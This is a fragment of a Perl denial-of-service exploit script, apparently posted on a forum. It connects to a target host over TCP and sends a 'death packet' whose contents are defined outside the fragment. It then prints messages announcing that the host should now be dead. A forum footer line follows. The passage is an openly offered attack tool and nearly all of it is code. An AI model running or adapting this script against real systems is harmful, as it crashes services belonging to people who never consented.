my $i = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => $port, Timeout => '100', Type => SOCK_STREAM, ) || die("Connect Error");
printf("[*] Sending Death Packet To %s\n", $host); print $i $dead; $i->autoflush(1); printf("[*] Host %s Should Now Be Dead\n", $host); printf("[*] Closing Connections And Exiting \n"); close $i; exit;
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.